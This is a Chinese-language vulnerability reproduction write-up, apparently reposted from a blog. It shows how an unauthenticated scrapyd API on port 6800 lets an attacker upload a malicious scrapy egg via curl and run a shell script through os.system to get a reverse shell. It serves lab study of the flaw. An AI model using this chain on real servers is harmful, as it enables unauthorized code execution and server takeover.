ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

scrapyd 未授权访问漏洞

2022-05-16 08:02:34  阅读:164  来源: 互联网

标签:shell evil 漏洞 scrapy 6800 授权 egg scrapyd


scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。

参考链接:https://www.leavesongs.com/PENETRATION/attack-scrapy.html

环境搭建

执行如下命令启动scrapyd服务:

docker-compose up -d

环境启动后,访问http://your-ip:6800即可看到Web界面。

漏洞复现

参考攻击Scrapyd爬虫,构造一个恶意的scrapy包:

pip install scrapy scrapyd-client
scrapy startproject evil
cd evil
# 编辑 evil/__init__.py, 加入恶意代码

shell.txt内容为反弹Shell命令

然后,我们用scrapyd-client这个工具,将项目打包成egg包。当然也可以自己用setuptools手工打包。

向API接口发送恶意包:

curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg

此时靶机中已经生成shell.sh,只需将其运行,所以我们再次修改py文件内容,并再次向API接口发送恶意包

import os

os.system('/bin/bash /tmp/shell.sh')

成功反弹Shell:

 

标签:shell,evil,漏洞,scrapy,6800,授权,egg,scrapyd
来源: https://www.cnblogs.com/NoCirc1e/p/16275594.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有